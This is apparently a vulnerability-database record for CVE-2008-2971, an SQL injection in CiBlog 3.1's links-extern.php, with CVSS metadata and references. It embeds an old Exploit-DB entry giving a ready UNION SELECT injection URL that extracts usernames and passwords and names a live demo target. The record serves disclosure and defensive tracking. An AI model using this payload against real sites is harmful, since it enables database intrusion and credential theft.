ID CVE-2008-2971
Type cve
Reporter cve@mitre.org
Modified 2017-09-29T01:31:00
Description
SQL injection vulnerability in links-extern.php in CiBlog 3.1 allows remote attackers to execute arbitrary SQL commands via the id parameter.
{"id": "CVE-2008-2971", "bulletinFamily": "NVD", "title": "CVE-2008-2971", "description": "SQL injection vulnerability in links-extern.php in CiBlog 3.1 allows remote attackers to execute arbitrary SQL commands via the id parameter.", "published": "2008-07-02T17:14:00", "modified": "2017-09-29T01:31:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-2971", "reporter": "cve@mitre.org", "references": ["http://secunia.com/advisories/30807", "https://exchange.xforce.ibmcloud.com/vulnerabilities/43267", "http://www.securityfocus.com/bid/29852", "https://www.exploit-db.com/exploits/5875"], "cvelist": ["CVE-2008-2971"], "type": "cve", "lastseen": "2021-02-02T05:35:14", "edition": 4, "viewCount": 2, "enchantments": {"dependencies": {"references": [{"type": "exploitdb", "idList": ["EDB-ID:5875"]}], "modified": "2021-02-02T05:35:14", "rev": 2}, "score": {"value": 7.6, "vector": "NONE", "modified": "2021-02-02T05:35:14", "rev": 2}, "vulnersScore": 7.6}, "cpe": ["cpe:/a:cistyle:ciblog:3.1"], "affectedSoftware": [{"cpeName": "cistyle:ciblog", "name": "cistyle ciblog", "operator": "eq", "version": "3.1"}], "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": true, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {}, "cpe23": ["cpe:2.3:a:cistyle:ciblog:3.1:*:*:*:*:*:*:*"], "cwe": ["CWE-89"], "scheme": null, "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:cistyle:ciblog:3.1:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}]}, "extraReferences": [{"name": "30807", "refsource": "SECUNIA", "tags": [], "url": "http://secunia.com/advisories/30807"}, {"name": "5875", "refsource": "EXPLOIT-DB", "tags": [], "url": "https://www.exploit-db.com/exploits/5875"}, {"name": "29852", "refsource": "BID", "tags": [], "url": "http://www.securityfocus.com/bid/29852"}, {"name": "ciblog-linksextern-sql-injection(43267)", "refsource": "XF", "tags": [], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/43267"}]}
{"exploitdb": [{"lastseen": "2016-01-31T22:43:47", "description": "CiBlog 3.1 (links-extern.php id) Remote SQL Injection Vulnerability. CVE-2008-2971. Webapps exploit for php platform", "published": "2008-06-20T00:00:00", "type": "exploitdb", "title": "CiBlog 3.1 links-extern.php id Remote SQL Injection Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-2971"], "modified": "2008-06-20T00:00:00", "id": "EDB-ID:5875", "href": "https://www.exploit-db.com/exploits/5875/", "sourceData": "#########################################################################\n#################### Viva IslaM Viva IslaM ##############################\n##\n## Remote SQL Injection Vulnerability\n##\n## CiBlog 3.1 ( links-extern.php id )\n##\n#########################################################################\n#########################################################################\n##\n## AuTh0r : Mr.SQL\n##\n## H0ME : WwW.PaL-HaCkEr.CoM & WwW.ATsDp.CoM\n##\n## Email : SQL@Hotmail.it\n##\n## !! SYRIAN HaCkErS !!\n########################\n########################\n##\n## Script : CiBlog 3.1\n##\n## site : www.cistyle.de\n##\n########################\n########################\n##\n## -(:: SQL ::)-\n##\n## www.site.com/\n## links-extern.php?id=-2+union+select+1,concat_ws(0x3a,user,password),1,1,1,1+from+user/*\n##\n## -(:: L!VE DEMO ::)-\n##\n## http://www.cistyle.de/demo/links-extern.php?id=-2+union+select+1,concat_ws(0x3a,user,password),1,1,1,1+from+user/*\n##\n#######################\n#######################\n\n\n#######################################################################################################\n#######################################################################################################\n\n -(:: !Gr3E3E3E3E3E3E3TzZ! ::)-\n\n :: HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMeD el 3rab :: ALwHeD :: HeBarieH :: MusliMs HaCkErs ::\n#######################################################################################################\n#######################################################################################################\n\n# milw0rm.com [2008-06-20]\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/5875/"}]}
